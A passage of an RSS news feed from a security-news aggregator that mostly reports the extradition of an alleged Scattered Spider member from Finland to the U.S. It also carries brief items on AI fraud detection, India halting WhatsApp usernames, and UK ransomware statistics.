<content:encoded><![CDATA[<p>Alleged Scattered Spider member Peter Stokes, 19, was extradited from Finland to the U.S. over hacking, fraud, and extortion charges. Peter Stokes, 19, an alleged Scattered Spider member known online as “Bouquet,” has been extradited from Finland to the U.S.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/alleged-scattered-spider-hacker-extradited-to-u-s-to-face-cybercrime-charges/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/alleged-scattered-spider-hacker-extradited-to-u-s-to-face-cybercrime-charges/">Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alleged Scattered Spider Member Arrested in Finland, Extradited to U.S.]]></title>
<description><![CDATA[An alleged member of the Scattered Spider cybercrime group has been extradited from Finland to the United States to face federal charges related to conspiracy, cyber intrusion, and fraud. U.S. authorities said the case marks another step in their ongoing efforts to prosecute individuals accused o...]]></description>
<link>https://tsecurity.de/de/3640162/it-security-nachrichten/alleged-scattered-spider-member-arrested-in-finland-extradited-to-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640162/it-security-nachrichten/alleged-scattered-spider-member-arrested-in-finland-extradited-to-us/</guid>
<pubDate>Thu, 02 Jul 2026 07:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Scattered Spider" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Scattered-Spider-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Alleged Scattered Spider Member Arrested in Finland, Extradited to U.S. 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="370" data-end="763">An alleged member of the <a href="https://thecyberexpress.com/?s=Scattered+Spider" target="_blank" rel="noopener">Scattered Spider </a>cybercrime group has been extradited from Finland to the United States to face federal charges related to conspiracy, cyber intrusion, and fraud. U.S. authorities said the case marks another step in their ongoing efforts to prosecute individuals accused of participating in high-profile cybercrime operations linked to the notorious hacking group.</p>
<p data-start="765" data-end="1255">Peter Stokes, 19, a dual U.S. and Estonian citizen, made his initial appearance in federal court in Chicago after being extradited from Finland.</p>
<p data-start="765" data-end="1255">According to the <a href="https://thecyberexpress.com/justice-department-seizes-heartsender-websites/" target="_blank" rel="noopener">U.S. Department of Justice</a>, Stokes was arrested by Finnish authorities in April following an Interpol Red Notice and was transferred to the United States last week. A criminal complaint filed in the Northern District of Illinois accuses him of participating in cyberattacks carried out as part of the Scattered Spider group.</p>

<h3 data-section-id="vaw638" data-start="1257" data-end="1323"><strong><span role="text">Scattered Spider Linked to More Than 100 Network Intrusions</span></strong></h3>
<p data-start="1325" data-end="1646">According to the <a href="https://www.justice.gov/usao-ndil/media/1450651/dl?inline" target="_blank" rel="nofollow noopener">complaint</a>, Scattered Spider, also known as Octo Tempest, UNC3944, and 0ktapus, has been associated with more than 100 network intrusions. Authorities allege the group's activities have resulted in over $100 million in ransom payments and millions of dollars in additional damages suffered by victims.</p>
<p data-start="1648" data-end="2020">Investigators said the group targeted companies across the United States by obtaining access to employee accounts through fraudulent methods.</p>
<p data-start="1648" data-end="2020">Once inside corporate networks, the attackers allegedly encrypted <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28891">data</a> or exfiltrated sensitive information to remote servers before demanding cryptocurrency payments to restore access or prevent the public release of stolen data.</p>

<h3 data-section-id="1il9mbm" data-start="2022" data-end="2082"><span role="text"><strong data-start="2025" data-end="2082">Complaint Details Alleged Luxury Retailer Cyberattack</strong></span></h3>
<p data-start="2084" data-end="2206">The criminal complaint describes an alleged <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28893">cyber</a> intrusion that occurred in May 2025 involving a luxury jewelry retailer.</p>
<p data-start="2208" data-end="2558">Federal prosecutors allege that Stokes and other co-conspirators breached the retailer's computer systems, exfiltrated company data, and demanded approximately $8 million in cryptocurrency as ransom. According to <a href="https://www.justice.gov/usao-ndil/pr/alleged-member-criminal-cyber-hacking-group-scattered-spider-arrested-finland-and" target="_blank" rel="nofollow noopener">court documents</a>, the retailer's security team successfully removed the threat actors from its network before any ransom payment was made.</p>
<p data-start="2560" data-end="2765">Although the company did not pay the ransom, authorities said it still incurred losses of at least $2 million due to business disruption, investigation costs, and mitigation efforts following the incident.</p>

<h3 data-section-id="4n7c6v" data-start="2767" data-end="2819"><strong><span role="text">Operation Riptide Targets Cybercrime Networks</span></strong></h3>
<p data-start="2821" data-end="3204">The extradition and criminal charges were announced by the Department of Justice, the U.S. Attorney's Office for the Northern District of Illinois, and the FBI. The investigation also involved the FBI's Copenhagen Law Enforcement Attaché Office, the <a href="https://thecyberexpress.com/fbi-warns-of-malicious-traffic/" target="_blank" rel="noopener">FBI</a> Las Vegas Field Office, the Justice Department's Office of International Affairs, and Finland's National Bureau of Investigation.</p>
<p data-start="3206" data-end="3409">Officials said the case forms part of Operation Riptide, an ongoing FBI campaign focused on disrupting cybercriminal actors, infrastructure, financial networks, and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28890">fraud</a> schemes targeting Americans.</p>
<p data-start="3411" data-end="3566">According to the FBI, Americans reported more than $20 billion in <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28889">cybercrime</a> losses last year, representing a 26% increase compared with the previous year.</p>

<h3 data-section-id="1bg9rey" data-start="3568" data-end="3617"><strong><span role="text">Authorities Cite International Cooperation</span></strong></h3>
<p data-start="3619" data-end="3903">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28894">General</a> A. Tysen Duva said the charges stem from years of investigative work by the Justice Department, the U.S. Attorney's Office, and the FBI, adding that authorities would continue working together to pursue cybercriminals operating across international borders.</p>
<p data-start="3905" data-end="4130">U.S. Attorney Andrew S. Boutros said the alleged attacks caused significant disruption to businesses across the United States and emphasized the government's commitment to prosecuting individuals involved in cyber intrusions.</p>
<p data-start="4132" data-end="4357">FBI Special Agent-in-Charge Douglas S. DePodesta also highlighted the role of international law enforcement partnerships in identifying alleged members of the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-hacking/" title="hacking" data-wpil-keyword-link="linked" data-wpil-monitor-id="28892">hacking</a> group and pursuing cross-border cybercrime investigations.</p>

<h3 data-section-id="1eggqu1" data-start="4359" data-end="4408"><strong><span role="text">Recent Guidance on Scattered Spider Threat</span></strong></h3>
<p data-start="4410" data-end="4694">The arrest follows recent law enforcement efforts targeting the Scattered Spider threat group. In July 2025, the <a href="https://thecyberexpress.com/fbi-cisa-warn-about-scattered-spider/" target="_blank" rel="noopener">FBI and CISA released updated</a> guidance describing the group's latest attack techniques, including the use of <a href="https://thecyberexpress.com/lockbit-and-dragonforce-ransomware-binary/" target="_blank" rel="noopener">DragonForce ransomware </a>to encrypt VMware ESXi servers.</p>
<p data-start="4696" data-end="4894">The advisory urged organizations to maintain isolated offline backups, implement phishing-resistant <a href="https://thecyberexpress.com/phishing-attacks/" target="_blank" rel="noopener">multifactor authentication</a> (MFA), and apply application controls to manage software execution.</p>
<p data-start="4896" data-end="5134">Separately, in November 2025, <a href="https://thecyberexpress.com/scattered-spider-teens-plead-not-guilty/" target="_blank" rel="nofollow noopener">two alleged Scattered Spider members</a> appeared before Southwark Crown Court in the United Kingdom and pleaded not guilty to charges related to the August 2024 <a href="https://thecyberexpress.com/transport-for-london-cyberattack-plead-guilty/" target="_blank" rel="noopener">cyberattack on </a>Transport for London (TfL).</p>
<p data-start="5136" data-end="5326">The Department of Justice emphasized that the complaint against Stokes contains allegations only. As with all criminal cases, he is presumed innocent unless and until proven guilty in court.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[Swati KhandelwalJul 01, 2026Cybercrime / Ransomware A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a d...]]></description>
<link>https://tsecurity.de/de/3640068/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640068/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Thu, 02 Jul 2026 05:22:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Swati KhandelwalJul 01, 2026Cybercrime / Ransomware A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on […]]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and…
Read more →
The post 19-Year-Old Scatter...]]></description>
<link>https://tsecurity.de/de/3639623/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639623/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Wed, 01 Jul 2026 22:23:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/19-year-old-scattered-spider-suspect-extradited-to-face-u-s-hacking-charges/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/19-year-old-scattered-spider-suspect-extradited-to-face-u-s-hacking-charges/">19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges]]></title>
<description><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1.

Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago ...]]></description>
<link>https://tsecurity.de/de/3639588/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639588/it-security-nachrichten/19-year-old-scattered-spider-suspect-extradited-to-face-us-hacking-charges/</guid>
<pubDate>Wed, 01 Jul 2026 22:06:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1.

Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on June 30, where a judge ordered him held in custody.

Finnish police]]></content:encoded>
</item>
<item>
<title><![CDATA[How Inscribe uses Amazon Bedrock to stop document fraud in seconds]]></title>
<description><![CDATA[In this post, you will learn how Inscribe developed an agentic AI system using Amazon Bedrock that reasons across documents the way an expert fraud analyst would. With this new agentic AI system, Inscribe now detects tampered, fabricated, and AI-generated financial documents in under 90 seconds. ...]]></description>
<link>https://tsecurity.de/de/3639374/ai-nachrichten/how-inscribe-uses-amazon-bedrock-to-stop-document-fraud-in-seconds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639374/ai-nachrichten/how-inscribe-uses-amazon-bedrock-to-stop-document-fraud-in-seconds/</guid>
<pubDate>Wed, 01 Jul 2026 20:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In this post, you will learn how Inscribe developed an agentic AI system using Amazon Bedrock that reasons across documents the way an expert fraud analyst would. With this new agentic AI system, Inscribe now detects tampered, fabricated, and AI-generated financial documents in under 90 seconds. This is a 20x improvement over traditional manual review, while maintaining the accuracy and explainability required by financial services regulations.]]></content:encoded>
</item>
<item>
<title><![CDATA[Indian Govt Halts Meta’s WhatsApp Usernames Rollout Over Fraud Concerns]]></title>
<description><![CDATA[The Indian government has issued a formal notice to WhatsApp LLC (Meta), directing the platform to justify why regulatory action should not be taken against its newly announced “usernames” feature and instructing the company not to roll it out in…
Read more →
The post Indian Govt Halts Meta’s Wha...]]></description>
<link>https://tsecurity.de/de/3639301/it-security-nachrichten/indian-govt-halts-metas-whatsapp-usernames-rollout-over-fraud-concerns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639301/it-security-nachrichten/indian-govt-halts-metas-whatsapp-usernames-rollout-over-fraud-concerns/</guid>
<pubDate>Wed, 01 Jul 2026 19:38:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Indian government has issued a formal notice to WhatsApp LLC (Meta), directing the platform to justify why regulatory action should not be taken against its newly announced “usernames” feature and instructing the company not to roll it out in…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/indian-govt-halts-metas-whatsapp-usernames-rollout-over-fraud-concerns/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/indian-govt-halts-metas-whatsapp-usernames-rollout-over-fraud-concerns/">Indian Govt Halts Meta’s WhatsApp Usernames Rollout Over Fraud Concerns</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Indian Govt Orders Meta to Halt WhatsApp Usernames Rollout Over Fraud, Impersonation Risks]]></title>
<description><![CDATA[The Indian government has issued a formal notice to WhatsApp LLC (Meta), directing the platform to justify why regulatory action should not be taken against its newly announced “usernames” feature and instructing the company not to roll it out in India until consultations are satisfactorily concl...]]></description>
<link>https://tsecurity.de/de/3639178/it-security-nachrichten/indian-govt-orders-meta-to-halt-whatsapp-usernames-rollout-over-fraud-impersonation-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639178/it-security-nachrichten/indian-govt-orders-meta-to-halt-whatsapp-usernames-rollout-over-fraud-impersonation-risks/</guid>
<pubDate>Wed, 01 Jul 2026 18:37:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Indian government has issued a formal notice to WhatsApp LLC (Meta), directing the platform to justify why regulatory action should not be taken against its newly announced “usernames” feature and instructing the company not to roll it out in India until consultations are satisfactorily concluded. The letter, addressed to WhatsApp’s Chief Compliance Officer for […]</p>
<p>The post <a href="https://cybersecuritynews.com/indian-govt-whatsapp-usernames/">Indian Govt Orders Meta to Halt WhatsApp Usernames Rollout Over Fraud, Impersonation Risks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Over 300 UK Firms Hit by Ransomware in Year]]></title>
<description><![CDATA[UK organizations suffered 323 confirmed ransomware attacks between April 2025 and March 2026, according to data from Report Fraud and the City of London Police. This article has been indexed from CyberMaterial Read the original article: Over 300 UK Firms…
Read more →
The post Over 300 UK Firms Hi...]]></description>
<link>https://tsecurity.de/de/3638794/it-security-nachrichten/over-300-uk-firms-hit-by-ransomware-in-year/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638794/it-security-nachrichten/over-300-uk-firms-hit-by-ransomware-in-year/</guid>
<pubDate>Wed, 01 Jul 2026 16:24:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>UK organizations suffered 323 confirmed ransomware attacks between April 2025 and March 2026, according to data from Report Fraud and the City of London Police. This article has been indexed from CyberMaterial Read the original article: Over 300 UK Firms…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/over-300-uk-firms-hit-by-ransomware-in-year/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/over-300-uk-firms-hit-by-ransomware-in-year/">Over 300 UK Firms Hit by Ransomware in Year</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 1,12ms -->